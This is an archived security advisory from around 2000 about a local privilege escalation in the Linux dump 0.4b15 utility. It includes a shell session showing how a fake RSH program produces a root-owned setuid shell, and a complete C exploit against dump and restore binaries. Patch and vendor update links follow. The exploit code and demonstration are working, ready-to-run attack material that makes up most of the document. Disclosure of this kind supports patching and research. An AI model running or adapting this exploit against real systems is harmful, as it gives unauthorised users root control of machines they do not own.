Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: dump3.htm

Dump 0.4b15 executes external with suid privilege



Vulnerability

    dump

Affected

    dump-0.4b15

Description

    Mat found following.  Linux dump command executes external program
    with suid priviledge.  Example:

        [mat@localhost mat]$ export TAPE=garbage:garbage
        [mat@localhost mat]$ export RSH=/home/mat/execute_this
        [mat@localhost mat]$ cat > /home/mat/execute_this
        #!/bin/sh
        cp /bin/sh /home/mat/sh
        chmod 4755 /home/mat/sh
        [mat@localhost mat]$ chmod 755 /home/mat/execute_this
        [mat@localhost mat]$ /sbin/dump -0 /
          DUMP: Connection to garbage established.
          DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
          DUMP: Date of last level 0 dump: the epoch
          DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
          DUMP: Label: none
        /dev/hda2: Permission denied while opening filesystem
         [mat@localhost mat]$ ls -la /home/mat/sh
         -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
         [mat@localhost mat]$ /home/mat/sh
         bash# id
         uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

    This is quick and dirty exploit:

    /*
    **
    **  dump-0.4b15x.c
    **
    **  dump-0.4b15 exploit:
    **  Redhat 6.2 dump command executes
    **  external program with suid priviledge.
    **
    **  affected:
    **     /sbin/dump
    **     /sbin/dump.static
    **     /sbin/restore
    **     /sbin/restore.static
    **
    **  Bug found by mat@hacksware.com
    **
    **  This example was coded by md0claes@mdstud.chalmers.se
    **  It was written for EDUCATIONAL PURPOSES ONLY.
    **
    **
    */


    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    #define RUNME     "/tmp/runme"      /* tmp file */
    #define SUID_PATH "/tmp/superdude" /* the power of root */

    void usage(char *pname)
    {
     fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
     fprintf(stdout,   "  d - exploit /sbin/dump\n");
     fprintf(stdout,   "  s - exploit /sbin/dump.static\n");
     fprintf(stdout,   "  r - exploit /sbin/restore\n");
     fprintf(stdout,   "  p - exploit /sbin/restore.static\n\n");
    }

    int main(int argc, char *argv[], char *envp[])
    {
     int fd;
     pid_t pid;
     char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
     char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                        SUID_PATH "\nchmod 6755 " SUID_PATH };

     char *suid[] = { SUID_PATH, NULL };
     char   *av[] = { "/sbin/restore.static", "restore.static",
                      "-t", "/tmp/foo" };

     if (argc != 2) {
      usage(argv[0]);
      exit(1);
     }

     switch(tolower(argv[1][0])) {

      case 'd':
       av[0] = "/sbin/dump";
       av[1] = "dump";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 's':
       av[0] = "/sbin/dump.static";
       av[1] = "dump.static";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 'r':
       av[0] = "/sbin/restore";
       av[1] = "restore";
       break;

      case 'p':
       break;

      default:
       usage(argv[0]);
       exit(1);
     }

     if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
      perror("fopen");
      exit(1);
     }

     if (write(fd, runbuf, sizeof(runbuf)) == -1) {
      perror("write");
      exit(1);
     }
     close(fd);

     if ((pid = fork()) < 0) {
      perror("fork");
      exit(1);
     }

     else if (pid == 0) {
      if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
       perror("execle");
       _exit(1);
      }
     }

     sleep(1);
     unlink(RUNME);
     fprintf(stdout, "\nExploited %s \n", av[0]);
     fprintf(stdout, "Running " SUID_PATH "\n");
     execve(SUID_PATH, suid, envp);

     exit(0);
    }

Solution

    This is the location for the latest version

        ftp://ftp.sourceforge.net/pub/sourceforge/dump/

    dump is no longer suid root.

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm

    All released versions  of Trustix Secure  Linux contain a  version
    of dump that is known to  have a local root exploit.   People with
    untrusted local users should upgrade as soon as possible.  Get the
    packages at:

        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
             dump-0.4b19-2tr.i586.rpm
             rmt-0.4b19-2tr.i586.rpm

    Conectiva last mandatory update of the dump package brought it  up
    to version 0.4b18 and had the SUID bits disabled.  These  packages
    do not have the vulnerability discussed above.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH